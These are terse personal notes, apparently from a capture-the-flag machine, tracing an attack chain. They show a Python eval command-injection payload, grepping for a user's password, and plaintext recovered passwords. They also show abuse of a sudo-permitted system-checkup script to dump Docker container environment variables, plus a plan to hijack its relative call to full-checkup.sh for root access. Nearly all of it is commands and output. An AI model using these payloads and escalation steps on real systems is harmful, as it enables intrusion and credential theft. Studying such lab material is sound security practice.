command injection on query due to eval
'+__import__('os').system("bla bla") )#
find password to cody via
grep -Ri cody
svc shares password
~~jh1usoih2bkjaspwe92~~
we have a sudo thing on the /opt/scripts/ script. theres a repo so maybe we find admin cred
find containers
sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
960873171e2e gitea/gitea:latest "/usr/bin/entrypoint…" 3 months ago Up 3 hours 127.0.0.1:3000->3000/tcp, 127.0.0.1:222->22/tcp gitea
f84a6b33fb5a mysql:8 "docker-entrypoint.s…" 3 months ago Up 3 hours 127.0.0.1:3306->3306/tcp, 33060/tcp mysql_db
get envvars
sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .Config}}' "9608" | jq
administrator on gitea shares password yuiu1hoiu4i5ho1uh
now we can see what the scripts do
sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
calls ./full-checkup.sh
so just hijack it with our own